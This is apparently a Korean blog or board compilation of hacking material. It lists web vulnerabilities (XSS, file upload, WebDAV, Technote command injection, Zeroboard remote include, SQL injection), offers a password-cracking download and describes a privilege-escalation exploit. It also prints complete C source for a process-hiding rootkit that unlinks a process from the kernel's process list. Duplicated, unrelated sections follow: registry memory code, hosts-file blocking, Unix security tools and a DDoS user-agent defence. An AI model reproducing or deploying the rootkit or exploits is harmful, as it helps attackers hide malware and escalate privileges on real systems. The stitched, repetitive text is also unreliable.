게시판에 새 게시물을 작성하여 등록할 때와 같이 사용자의 입력을 받아 처리하는 웹 응용프로그램에서 입력 내용에 대해 실행코드인 스크립트의 태그를 적절히 필터링하지 않을 경우에 악의적인 스크립트가 포함된 게시물을 등록할 수 있어 해당 게시물을 열람하는 일반 사용자의 pc로 부터 개인정보인 쿠키를 유출할 수 있는 등의 피해를 초래할 수 있다.
4. 파일 업로드 취약점
첨부파일 업로드를 허용하는 홈페이지 게시판에서 .php, .jsp등의 확장자 이름의 스크립트 파일의 업로드를 허용할 경우에 해커가 악성 실행 프로그램을 업로드한 후에 홈페이지 접속방식으로 원격에서 서버컴퓨터의 시스템 운영 명령어를 실행 시킬 수 있다.
5.WebDAV 취약점- 원격 실행
윈도우 서버 컴퓨터에서 기본으로 설치되는 원격관리기능인 WebDAV가 계속 사용 가능하도록 설정되어 있고, WebDAV 라이브러리 파일의 속성 및 홈페이지 디렉토리에 쓰기 권한이 모두 허용되어 있는 경우에 해커가 WevDAV도구를 사용, 원격에서 홈페이지 디렉토리에 임으로 파일을 삽입하여 화면을 변조할 수 있다.
윈도우 서버 컴퓨터에서 기본으로 설치되는 원격관리기능인 WebDAV가 계속 사용 가능하도록 설정되어 있고, WebDAV 라이브러리 파일의 속성 및 홈페이지 디렉토리에 쓰기 권한이 모두 허용되어 있는 경우에 해커가 WevDAV도구를 사용, 원격에서 홈페이지 디렉토리에 임으로 파일을 삽입하여 화면을 변조할 수 있다.
6. 테크노트(Technote) 취약점
‘테크노트’의 일부 CGI프로그램들에서 인수 값 처리시에 ‘ㅣ’문자 이후에 나오는 컴퓨터 운영 명령어가 실행될 수 있는 결함이 있어 해커는 홈페이지접속 방식으로 컴퓨터 명령어를 실행하여 화면을 변조하거나 컴퓨터를 조작할 수 있다.
- Linux 및 Unix계열의 컴퓨터에 주로 사용
- Windows 계열에서 ‘Perl’이 지원될 경우 사용
7. 제로보드(Zeroboard) 취약점
- ‘제로보드’의 일부 php프로그램이 원격에 있는 php파일을 실행할 수 있는 결함이 있어 해커는 홈페이지 접속 방식으로 컴퓨터 명령어를 실행하여 화면을 변조하거나 컴퓨터를 조작할 수 있다.
- Linux 및 Unix 계열의 컴퓨터에 주로 사용
- Windows 계열에서 ‘php’가 지원될 경우 사용
8. SQL Injection 취약점
웹 브라우저 주소 창 또는 사용자 ID 및 패스워드 입력화면에서 데이터베이스 SQL문에 사용되는 문자기호(‘ 및”)의 입력을 적절히 필터링 하지 않은 경우에 해커가 SQL 문으로 해석될 수 있도록 조작한 입력으로
데이터베이스를 인증 절차 없이 접근, 자료를 무단 유출하거나 변조할 수 있다.
이건 사용법이 간단하면서도, 많이 사용하는 웹 웹핵 입니다.
웹에있는 아이디를 알아내서 비번을 알아내는 프로그램 입니다.
당근 해킹툴이라 백신에서 바이러스로 인식합니다.
Wwwhack_비번_해킹_한글판.zip
WinEggDrop이라는 중국 해커가 만든 툴이다.
소스설명)
레지스트리에서 물리적인 메모리를 추출하는 소스
/////////////////////////////////////////////////////////////////////////
//
// Module:
// Read physical memory information from registry
// HKLM\HARDWARE\RESOURCEMAP\System Resources\Physical Memory
//
// Author:
// CDrea (CDrea_at_SafeChina[dot]ORG
//
// Version:
// 2007-12-24 v0.1
//
/////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <stdio.h>
struct _mi {
LARGE_INTEGER Address;
DWORD Length;
DWORD Reserved;
};
#define MI_LEN sizeof(struct _mi)
typedef struct _phy_mem_info {
DWORD BusCount;
DWORD MemoryRangeCount;
struct _mi* MemInfoPtr;
}PHY_MEM_INFO;
BOOL
GetPhyMemoryInfo(
OUT PHY_MEM_INFO* PhyMemInfo
);
void logo();
int main()
{
PHY_MEM_INFO PhyMemInfo = {0};
LARGE_INTEGER TotalSize = {0};
logo();
if(!GetPhyMemoryInfo(&PhyMemInfo)) return -1;
for(DWORD i = 0; i < PhyMemInfo.MemoryRangeCount; i++)
{
TotalSize.QuadPart += (PhyMemInfo.MemInfoPtr + i)->Length;
}
printf("Total memory: %d MB\n", TotalSize.QuadPart / 1024 / 1024);
printf("Bus count: %d\n", PhyMemInfo.BusCount);
printf("Memory ranges:\n");
for(DWORD i = 0; i < PhyMemInfo.MemoryRangeCount; i++)
{
printf(" 0x%-016I64X Length: 0x%X (%dK)\n",
(PhyMemInfo.MemInfoPtr + i)->Address.QuadPart,
(PhyMemInfo.MemInfoPtr + i)->Length,
(PhyMemInfo.MemInfoPtr + i)->Length / 1024);
}
if(PhyMemInfo.MemInfoPtr != NULL)
free(PhyMemInfo.MemInfoPtr);
return 0;
}
BOOL
GetPhyMemoryInfo(
OUT PHY_MEM_INFO* PhyMemInfo
)
{
HKEY hKey;
int nRet = 0;
nRet = RegOpenKey(HKEY_LOCAL_MACHINE, "Hardware\\ResourceMap\\System Resources\\Physical Memory", &hKey);
if(nRet != ERROR_SUCCESS)
{
fprintf(stderr, "RegOpenKey() failed. --err: %d\n", GetLastError());
return FALSE;
}
DWORD Type = 0;
DWORD cbData = 0;
LPBYTE lpData = NULL;
LPBYTE pmrc = NULL;
RegQueryValueEx(hKey, ".Translated", 0, &Type, NULL, &cbData);
lpData = (LPBYTE)malloc(cbData);
RegQueryValueEx(hKey, ".Translated", 0, &Type, lpData, &cbData);
if(nRet != ERROR_SUCCESS)
{
fprintf(stderr, "RegQueryValueEx() failed. --err: %d\n", GetLastError());
return FALSE;
}
DWORD BusCount = *(DWORD*)lpData;
if(BusCount <= 0)
{
fprintf(stderr, "Cannot get valid memory information.\n");
return FALSE;
}
LPBYTE p = lpData + 0x10;
DWORD MemoryRangesCount = 0;
for(DWORD i = 1; i <= BusCount; i++)
{
MemoryRangesCount += *(DWORD*)p;
p = p + 0x8 + i * (*(DWORD*)p) * 0x10;
}
p = lpData + 0x10;
PhyMemInfo->MemInfoPtr = (struct _mi*)malloc(MI_LEN * MemoryRangesCount);
if(PhyMemInfo->MemInfoPtr == NULL)
{
fprintf(stderr, "Not enough memory.\n");
return FALSE;
}
LPBYTE pmi = NULL;
struct _mi* ptr = PhyMemInfo->MemInfoPtr;
for(DWORD i = 1; i <= BusCount; i++)
{
pmi = p + 0x8;
for(DWORD j = 0; j < *(DWORD*)p; j++)
{
ptr->Address.LowPart = *(DWORD*)pmi;
ptr->Address.HighPart = *(long*)(pmi + 0x4);
ptr->Length = *(DWORD*)(pmi + 0x8);
ptr++;
pmi += MI_LEN;
}
p = p + 0x8 + i * (*(DWORD*)p) * 0x10;
}
PhyMemInfo->BusCount = BusCount;
PhyMemInfo->MemoryRangeCount = MemoryRangesCount;
RegCloseKey(hKey);
free(lpData);
return TRUE;
}
void logo()
{
printf("+------------------------------------+\n");
printf("| Physical Memory Information v0.1 |\n");
printf("| Write by CDrea |\n");
printf("| CDrea_at_SafeChina[dot]ORG |\n");
printf("| 2007-12-24 |\n");
printf("| http://www.safechina.org |\n");
printf("+------------------------------------+\n\n");
}
레지스트리에서 물리적인 메모리를 추출하는 소스
/////////////////////////////////////////////////////////////////////////
//
// Module:
// Read physical memory information from registry
// HKLM\HARDWARE\RESOURCEMAP\System Resources\Physical Memory
//
// Author:
// CDrea (CDrea_at_SafeChina[dot]ORG
//
// Version:
// 2007-12-24 v0.1
//
/////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <stdio.h>
struct _mi {
LARGE_INTEGER Address;
DWORD Length;
DWORD Reserved;
};
#define MI_LEN sizeof(struct _mi)
typedef struct _phy_mem_info {
DWORD BusCount;
DWORD MemoryRangeCount;
struct _mi* MemInfoPtr;
}PHY_MEM_INFO;
BOOL
GetPhyMemoryInfo(
OUT PHY_MEM_INFO* PhyMemInfo
);
void logo();
int main()
{
PHY_MEM_INFO PhyMemInfo = {0};
LARGE_INTEGER TotalSize = {0};
logo();
if(!GetPhyMemoryInfo(&PhyMemInfo)) return -1;
for(DWORD i = 0; i < PhyMemInfo.MemoryRangeCount; i++)
{
TotalSize.QuadPart += (PhyMemInfo.MemInfoPtr + i)->Length;
}
printf("Total memory: %d MB\n", TotalSize.QuadPart / 1024 / 1024);
printf("Bus count: %d\n", PhyMemInfo.BusCount);
printf("Memory ranges:\n");
for(DWORD i = 0; i < PhyMemInfo.MemoryRangeCount; i++)
{
printf(" 0x%-016I64X Length: 0x%X (%dK)\n",
(PhyMemInfo.MemInfoPtr + i)->Address.QuadPart,
(PhyMemInfo.MemInfoPtr + i)->Length,
(PhyMemInfo.MemInfoPtr + i)->Length / 1024);
}
if(PhyMemInfo.MemInfoPtr != NULL)
free(PhyMemInfo.MemInfoPtr);
return 0;
}
BOOL
GetPhyMemoryInfo(
OUT PHY_MEM_INFO* PhyMemInfo
)
{
HKEY hKey;
int nRet = 0;
nRet = RegOpenKey(HKEY_LOCAL_MACHINE, "Hardware\\ResourceMap\\System Resources\\Physical Memory", &hKey);
if(nRet != ERROR_SUCCESS)
{
fprintf(stderr, "RegOpenKey() failed. --err: %d\n", GetLastError());
return FALSE;
}
DWORD Type = 0;
DWORD cbData = 0;
LPBYTE lpData = NULL;
LPBYTE pmrc = NULL;
RegQueryValueEx(hKey, ".Translated", 0, &Type, NULL, &cbData);
lpData = (LPBYTE)malloc(cbData);
RegQueryValueEx(hKey, ".Translated", 0, &Type, lpData, &cbData);
if(nRet != ERROR_SUCCESS)
{
fprintf(stderr, "RegQueryValueEx() failed. --err: %d\n", GetLastError());
return FALSE;
}
DWORD BusCount = *(DWORD*)lpData;
if(BusCount <= 0)
{
fprintf(stderr, "Cannot get valid memory information.\n");
return FALSE;
}
LPBYTE p = lpData + 0x10;
DWORD MemoryRangesCount = 0;
for(DWORD i = 1; i <= BusCount; i++)
{
MemoryRangesCount += *(DWORD*)p;
p = p + 0x8 + i * (*(DWORD*)p) * 0x10;
}
p = lpData + 0x10;
PhyMemInfo->MemInfoPtr = (struct _mi*)malloc(MI_LEN * MemoryRangesCount);
if(PhyMemInfo->MemInfoPtr == NULL)
{
fprintf(stderr, "Not enough memory.\n");
return FALSE;
}
LPBYTE pmi = NULL;
struct _mi* ptr = PhyMemInfo->MemInfoPtr;
for(DWORD i = 1; i <= BusCount; i++)
{
pmi = p + 0x8;
for(DWORD j = 0; j < *(DWORD*)p; j++)
{
ptr->Address.LowPart = *(DWORD*)pmi;
ptr->Address.HighPart = *(long*)(pmi + 0x4);
ptr->Length = *(DWORD*)(pmi + 0x8);
ptr++;
pmi += MI_LEN;
}
p = p + 0x8 + i * (*(DWORD*)p) * 0x10;
}
PhyMemInfo->BusCount = BusCount;
PhyMemInfo->MemoryRangeCount = MemoryRangesCount;
RegCloseKey(hKey);
free(lpData);
return TRUE;
}
void logo()
{
printf("+------------------------------------+\n");
printf("| Physical Memory Information v0.1 |\n");
printf("| Write by CDrea |\n");
printf("| CDrea_at_SafeChina[dot]ORG |\n");
printf("| 2007-12-24 |\n");
printf("| http://www.safechina.org |\n");
printf("+------------------------------------+\n\n");
}
ptsec이라고 하는 툴이다. 주로 쓰레드, 프로세스, 토콘의 impersonate thread exploit Administrator 권한 획득 해킹툴이다. 즉, 사용자 권한(IIS 웹서버 권한)에서 관리자 권한(Administrator)으로 권한을 상승시키는 로컬 Exploit 입니다. 원저자는 일본사람으로 추정되고 있다.
1) ptsec 구동
2) 각 프로세스마다 토큰 획득을 시도
출처 :http://coderant.egloos.com/3582126
http://cafe.naver.com/develx/26
위 주소에서 얻어옴...
///////////////////////////////////
어플리케이션 level에서 자신의 커널 level의 정보를 수정, 프로세서 고리를 끊는 방법으로
자기자신을 숨긴다.
별도의 디바이스드라이버를 작성하거나 등록 할 필요가 없어서 기존 프로그램에 손 쉽게 붙일 수 있다.
단지, 이 프로그램.... VISTA에서 안 돌아간다는거...
코드를 좀 수정하면 비스타에서도 가능 할 듯.. (프로세서 구조체의 번지만 다시 찾는다면은...)
// homin.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <malloc.h>
#include <windows.h>
//NTSTATUS값이 0이상이면 보통 성공한 상태를 의미한다
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
//사이즈를 잘못 맞춘 경우
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
//NT함수가 사용하는 리턴 값인 NTSTATUS는 LONG형으로 정의된다
typedef LONG NTSTATUS;
//원래 값이 엄청 많다
//16은 레퍼런스에는 나와있지 않은 값인데,
//이를 넣을 경우 SYSTEM_HANDLE_INFORMATION을 얻을 수 있다
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
//시스템 핸들에 대한 정보를 가지고 있다
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
//가상 메모리에 데이터를 쓰거나 읽을 때 사용하는 구조체이다
typedef struct _MEMORY_CHUNKS
{
PVOID pVirtualAddress;
PVOID pBuffer;
DWORD dwBufferSize;
} MEMORY_CHUNKS, *PMEMORY_CHUNKS;
//ZwSystemDebugControl의 첫 번째 인자
typedef enum _SYSDBG_COMMAND
{
SysDbgCopyMemoryChunks_0 = 0x08, //가상 메모리로부터 데이터를 읽을 때
SysDbgCopyMemoryChunks_1 = 0x09, //가상 메모리에 데이터를 쓸 때
} SYSDBG_COMMAND;
//DLL로 부터 로드해 사용해야 한다.. windows.h에 정의되어있지 않다
typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) ( IN SYSTEM_INFORMATION_CLASS
SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL );
typedef NTSTATUS ( __stdcall *ZWSYSTEMDEBUGCONTROL ) ( IN SYSDBG_COMMAND SysDbgChunks,
IN OUT PMEMORY_CHUNKS pQueryBuff,
DWORD dwSize, DWORD, DWORD, NTSTATUS *pResult);
//***********************************************************//
// ZwQuerySystemInformation은 시스템 정보를 얻어오는 함수로, //
// 첫 번째 인자에 16을 넘길 경우 현재 로드 되어있는 모든 //
// 핸들의 정보를 얻어오도록 되어있다. //
//***********************************************************//
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
//***********************************************************//
// ZwSystemDebugControl은 시스템 디버그에 관련된 명령을 수행 //
// 하는 함수로, 8또는 9를 넘길 경우 가상 메모리 공간을 //
// 읽거나 쓴다. //
//***********************************************************//
ZWSYSTEMDEBUGCONTROL ZwSystemDebugControl;
BOOL EnablePrivilege(LPCSTR lpName, HANDLE hProcess); //알맞는 권한을 획득한다
BOOL GetNativeAPIAddress(); //Native API의 주소를 얻어온다
PSYSTEM_HANDLE_INFORMATION GetProcessSystemHandleInfo(ULONG ulProcessId); //주어진 프로세스의 시스템 핸들 정보를 얻어온다
BOOL ReadVirtualMemory(PVOID pAddress, PVOID pBuffer, DWORD dwBufferSize); //가상 메모리 공간을 읽는다
BOOL WriteVirtualMemory(PVOID pAddress, PVOID pBuffer, DWORD dwBufferSize); //가상 메모리 공간에 데이터를 쓴다
BOOL HideProcess(DWORD dwProcessId); //프로세스를 숨긴다
BOOL EnablePrivilege(LPCSTR lpName, HANDLE hProcess)
{
//권한 토큰 구조체
TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
//lpName으로 지정된 권한 이름에 대한 LUID를 얻어낸다
LookupPrivilegeValue(0, lpName, &priv.Privileges[0].Luid);
//프로세스의 토큰 핸들을 얻고
HANDLE hToken;
OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken);
//입력받은 권한으로 프로세스 권한을 바꾼다
AdjustTokenPrivileges(hToken, FALSE, &priv, sizeof(TOKEN_PRIVILEGES), 0, 0);
BOOL rv = GetLastError() == ERROR_SUCCESS;
CloseHandle(hToken);
return rv;
}
//Native API의 주소를 얻어온다
BOOL GetNativeAPIAddress()
{
//ntdll.dll로드
HMODULE hNTDll;
if( (hNTDll = GetModuleHandle("ntdll.dll")) == NULL )
if( (hNTDll = LoadLibrary("ntdll.dll")) == NULL )
return FALSE;
//ZwQuerySystemInformation로드
if( (ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(
hNTDll, "ZwQuerySystemInformation")) == NULL )
return FALSE;
//ZwSystemDebugControl로드
if( (ZwSystemDebugControl = (ZWSYSTEMDEBUGCONTROL)GetProcAddress(
hNTDll, "ZwSystemDebugControl")) == NULL )
return FALSE;
return TRUE;
}
//프로세스의 아이디로 부터 ActiveProcessLinks정보를 가진 EPROCESS구조체의
//가상 메모리 공간상의 주소를 얻어온다
PSYSTEM_HANDLE_INFORMATION GetProcessSystemHandleInfo(ULONG ulProcessId)
{
NTSTATUS result;
PVOID pBuffer = NULL; //데이터를 읽어올 배열
PSYSTEM_HANDLE_INFORMATION pSystemHandleInfo; //핸들 정보 배열
PSYSTEM_HANDLE_INFORMATION pProcessHandle = NULL; //리턴할 값
//핸들의 수를 모르기 때문에, 적당한 사이즈를 알 수 없다
//때문에 반복문을 돌면서 그 값을 찾아야 한다
for( ULONG ulSize=1; ; ulSize *= 2 )
{
//정한 사이즈로 메모리를 할당한다
if( (pBuffer = malloc(ulSize) ) == NULL )
//실패할 경우 NULL 리턴
return NULL;
//시스템에 로드된 모든 핸들의 정보를 조사한다
result = ZwQuerySystemInformation(SystemHandleInformation, pBuffer, ulSize, NULL);
//실패할 경우
if( !NT_SUCCESS(result) )
{
//메모리 해제
free(pBuffer);
//사이즈를 잘못 정했다면 반복문을 계속 수행한다
if( result == STATUS_INFO_LENGTH_MISMATCH )
{
pBuffer = NULL;
}
//사이즈를 제대로 정했는데 실패한 것이라면 NULL을 리턴
else
{
return NULL;
}
}
//성공한 경우
else
//반복문을 빠져나간다
break;
}
//읽어온 데이터의 첫 번째 4바이트는 배열의 길이 정보이다
ULONG ulNumberOfHandles = *(PULONG)pBuffer;
//다음 4바이트 부터는 SYSTEM_HANDLE_INFORMATION구조체의 배열이다
pSystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)((PBYTE)pBuffer + sizeof(ULONG));
//핸들의 수 만큼 반복문을 돌면서
for( ULONG i=0; i<ulNumberOfHandles; i++ )
{
//입력받은 프로세스의 아이디와 일치하는 프로세스 아이디를 가지는
//프로세스 핸들을 찾을 경우
// (SYSTEM_HANDLE_INFORMATION구조체의 ObjectTypeNumber는
// 오브젝트의 종류를 나타내는 것으로, 5번은 프로세스를 뜻한다)
if( pSystemHandleInfo[i].ProcessId == ulProcessId &&
pSystemHandleInfo[i].ObjectTypeNumber == 5 )
{
//리턴할 값으로 저장하고 반복문을 빠져나간다
pProcessHandle = new SYSTEM_HANDLE_INFORMATION;
memcpy(pProcessHandle, pSystemHandleInfo + i, sizeof(SYSTEM_HANDLE_INFORMATION));
break;
}
}
//메모리 해제
if( pBuffer )
free(pBuffer);
//찾아낸 값을 리턴
return pProcessHandle;
}
//가상 메모리 공간을 읽어온다
BOOL ReadVirtualMemory(PVOID pAddress, PVOID pBuffer, DWORD dwBufferSize)
{
NTSTATUS result;
//메모리 청크 구조체
MEMORY_CHUNKS QueryBuff;
QueryBuff.pVirtualAddress = pAddress; //가상 메모리 주소
QueryBuff.pBuffer = pBuffer; //버퍼의 주소
QueryBuff.dwBufferSize = dwBufferSize; //버퍼의 크기
//가상 메모리 공간을 읽어서 버퍼에 기록한다
ZwSystemDebugControl(SysDbgCopyMemoryChunks_0, &QueryBuff,
sizeof(MEMORY_CHUNKS), NULL, 0, &result);
return NT_SUCCESS(result);
}
//가상 메모리 공간에 데이터를 쓴다
BOOL WriteVirtualMemory(PVOID pAddress, PVOID pBuffer, DWORD dwBufferSize)
{
NTSTATUS result;
//메모리 청크 구조체
MEMORY_CHUNKS QueryBuff;
QueryBuff.pVirtualAddress = pAddress; //가상 메모리 주소
QueryBuff.pBuffer = pBuffer; //버퍼의 주소
QueryBuff.dwBufferSize = dwBufferSize; //버퍼의 크기
//버퍼로 부터 값을 읽어서 가상 메모리 공간에 기록한다
ZwSystemDebugControl(SysDbgCopyMemoryChunks_1, &QueryBuff,
sizeof(MEMORY_CHUNKS), NULL, 0, &result);
return NT_SUCCESS(result);
}
//프로세스를 감춘다
BOOL HideProcess(DWORD dwProcessId)
{
//OS의 버젼에 따라 EPROCESS내의 ActiveProcessLinks의 오프셋이 다르기 때문에
//OS의 버젼을 파악하고 그에 따라 오프셋을 맞추어야 한다
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
//OS의 버젼을 얻어온다
GetVersionEx(&osvi);
int nFOffset, nBOffset;
if( osvi.dwMajorVersion == 5 )
{
switch( osvi.dwMinorVersion )
{
case 0: //Win2K
nFOffset = 0xa0;
nBOffset = 0xa4;
break;
case 1: //WinXP
nFOffset = 0x88;
nBOffset = 0x8C;
break;
case 2: //Win2003
nFOffset = 0x8a;
nBOffset = 0x8e;
break;
default:
return FALSE;
}
}
else if( osvi.dwMajorVersion == 4 &&
osvi.dwMinorVersion == 0 &&
osvi.dwPlatformId == 2 ) //WinNT
{
nFOffset = 0x98;
nBOffset = 0x9c;
}
else
return FALSE;
//프로세스를 열어야만 프로세스 핸들이 시스템에 로드된다
//프로세스를 연다
OpenProcess(PROCESS_QUERY_INFORMATION, 0, dwProcessId);
//주어진 프로세스의 시스템 핸들 정보를 얻어온다
PSYSTEM_HANDLE_INFORMATION pProcessHandle = GetProcessSystemHandleInfo(dwProcessId);
//잘못된 값을 얻어온 경우 리턴
if( pProcessHandle == NULL )
return FALSE;
//EPORCESS의 가상 메모리 공간상의 주소를 얻어온다
PVOID pEProcess = pProcessHandle->Object;
delete pProcessHandle;
//프로세스 핸들을 얻어온다 - 디버그 권한 설정에 사용된다
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId());
//디버그 권한을 설정한다
if( EnablePrivilege(SE_DEBUG_NAME, hProcess) == FALSE )
return FALSE;
CloseHandle(hProcess);
PVOID pFlink;
PVOID pBlink;
//ActiveProcessLinks의 Flink와 Blink의 가상 메모리 공간상의 주소를 얻어온다
if( ReadVirtualMemory((BYTE *)pEProcess + nFOffset, &pFlink, sizeof(PVOID)) )
if( ReadVirtualMemory((BYTE *)pEProcess + nBOffset, &pBlink, sizeof(PVOID)) )
//Flink의 Blink에 Blink를, Blink의 Flink에 Flink를 기록하여,
//프로세스를 리스트에서 제거한다
if( WriteVirtualMemory((BYTE *)pFlink + sizeof(PLIST_ENTRY), &pBlink, sizeof(PVOID)) )
if( WriteVirtualMemory((BYTE *)pBlink, &pFlink, sizeof(PVOID)) )
return TRUE;
return FALSE;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
GetNativeAPIAddress();
HideProcess(GetCurrentProcessId());
while(1) {
::OutputDebugString("김호민 바보ㅋㅋ");
Sleep(1000);
}
return 0;
}
hosts 파일을 이용하여 특정 사이트만 차단할 수 있습니다.
c:windows/system32/drivers/etc/ 경로에서
hosts 파일을 메모장으로 엽니다..
아래는 hosts 파일의 기본내용입니다.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
127.0.0.1 localhost ← 이 부분을 수정하여 사용합니다.
예를들어 네이버를 차단하고 싶다면
127.0.0.1 www.naver.com 을 한줄 더 추가해주시면 됍니다.
추가하고 싶은만큼 줄을 더 늘려가며 추가하면 됍니다.
단, http:// 를 붙이지 말고 / 도 넣으면 안됩니다.
수정 추가 후 파일을 저장해주시면 됍니다.
아래는 예제입니다.
서든어택과 메이플스토리를 차단한 모습입니다.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 suddenattack.netmarble.net
127.0.0.1 www.maplestory.com
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
SECURING YOUR UNIX SYSTEMS
- White Papers
- UNIX Password Security
- Password Security: A Case History
- Securing RedHat Linux | Solaris
- A Comaparison of the Security of Windows NT and UNIX
- Linux Security Quick Reference Guide
- Improving the security of your UNIX system
- Securing and Optimizing Red Hat Linux
- Solaris Security: Recommendations from SANS Step by Step
- Site Security Handbook - rfc1244 | rfc2196
- Guidelines for the Secure Operation of the Internet
- Solaris Operating Environment Security
- Rapid Recovery Techniques for Solaris Operating Environment
- Disaster Recovery Analysis Form
- Solaris Operating Environment Network Setting for Security
- UNIX System Security Checklist
- X Window Security
- UNIX Configuration Guidelines - from http://www.cert.org
- Tools
- John the Ripper
- John the Ripper is a password cracker, currently available for UNIX, DOS, Win32. Its primary purpose is to detect weak UNIX passwords.
- L0phtCrack
- Password Auditing and Recovery Application
- exec.c
- exec.c 1.0.4 is a kernel module which logs all the commands executed on the system. Extremely powerful stealth logging made easy! Changes: This release fixes a memory allocation problem. Please update to the current version if you use the module. This module should work on 2.2.* kernels. By Pat Szuta
- Virtual FTPD
- Virtual FTPD v6.4 is a secure FTP daemon which is derived from the OpenBSD ftp daemon and can allows virtual FTP accounts which do not have an /etc/passwd entry. For more information, here.
- Snoopy
- Snoopy is designed to log all commands executed by providing a transparent wrapper around calls to execve() via LD_PRELOAD. Logging is done via syslogd and written to authpriv, allowing secure offsite logging of activity. Changes: Integrity checking, a new method of logging, and faster logging.
- FPF
- FPF is a lkm for Linux which changes the TCP/IP stack in order to emulate other OS's TCP fingerprint. The package contains the lkm and a parser for the nmap file that let you choose directly the os you want. For more information, here.
- Imsafe
- Imsafe is a host-based intrusion detection tool for Linux which does anomaly detection at the process level and tries to detect various type of attacks. Since Imsafe doesn't know anything about specific attacks, it can detect unknown and unpublished attacks or any other form of malicious use of the monitored application. Created for Linux systems but works on almost every UNIX flavor by watching strace outputs. Screenshots available here. Warning: Still in alpha. For more information, here.
- IPtrap
- IPtrap listens to several TCP ports to simulate fake services (X11, Netbios, DNS, etc) . When a remote client connects to one of these ports, his IP address gets immediately firewalled and an alert is logged. It runs with iptables and ipchains, but any external script can also be launched. IPv6 is supported. Changes: Logging the scanned port, and no more iptables/ipchains zombies. For more information, here.
- LOMAC
- LOMAC is a security enhancement for Linux that uses Low Water-Mark Mandatory Access Control to protect the integrity of processes and data from viruses, Trojan horses, malicious remote users, and compromised root daemons. LOMAC is implemented as a loadable kernel module - no kernel recompilations or changes to existing applications are required. Although not all the planned features are currently implemented, it presently provides sufficient protection to thwart script-kiddies, and is stable enough for everyday use. Whitepaper available here. Manual available here. Changes: Added mediation of directory modification operations, improving protection. here.
- Maxty
- Maxty is a small kernel-space tty sniffer. It is a LKM which will attach to read/write syscalls and save incoming/outgoing requests to opened tty devices into separate log files. It provides a way keeping a track what is happening on virtual consoles similar to a keystroke recorder.
- John the Ripper
- Links
DDOS공격으로 인한 사이트마비는 시스템관리자라면 정말 짜증나고 싫은 장애이다.
나또한 DDOS공격으로 사이트가 15분간 마비 ㅠ_ㅠ
다음날 웹방화벽의 로그를 살펴보다 일반 PC와 좀비 PC와의 차이점을 찾게되었다.
user agent부분이었다 .. PC가 감염이 되면서 user agent부분에 특징적인 패턴이 붙게 되는데
일단은 한번 막아보기로했다 한대의 서버에만 웹방화벽의 정책을 수정했는데
그날 저녁 또 공격이 시작되었다 것도 사람이 많은 시간대로 ㅠ_ㅠ 정말이지 엔지니어는 업무시간
외에도 쉴수가 없는건지 업보인가...
웹방화벽의 패턴을 올린 서버는 공격을 모두 무력화 시키며 정상적인 서비스 중이었고 나머지 서버는
모두 웹이 뻗어 모니터링에서는 문자를 쉴세없이 보내고 있는 상황...
재빠르게 모든 서버에 접속해서 웹방화벽 정책을 업데이트하고 웹서비스를 재시작 시켰더니 음~~
꽤 생각외의 수확이~~~ 공격 2분만에 서비스 정상화 ^^ DDOS방어 솔루션자체의 가격이 워낙에
부담스러운 요즘에 웹방화벽이 효자역활을 톡톡히 하네요 ^^
적용 방법은 아래와 같습니다.
우선웹방화벽을 사용하고 계시면 DDOS공격시 패턴을 분석합니다.
User agent 의 패턴을 복사하여 robot.xml을 열고 other bad 항목에
추가를 해줍니다.
그리고 webknignt.xml파일일 열어
USE Denied User Agents를 체크를 해줍니다.
간단하면서도 정말 효과적인 부분이지요 ^^
그렇지만 위험부담도 크다는거 명심하세요 user agent를 막게해놓으면 지저분하게 브라우저를 사용하는
일반 사용자의 막힘 현상도 있습니다.
나또한 DDOS공격으로 사이트가 15분간 마비 ㅠ_ㅠ
다음날 웹방화벽의 로그를 살펴보다 일반 PC와 좀비 PC와의 차이점을 찾게되었다.
user agent부분이었다 .. PC가 감염이 되면서 user agent부분에 특징적인 패턴이 붙게 되는데
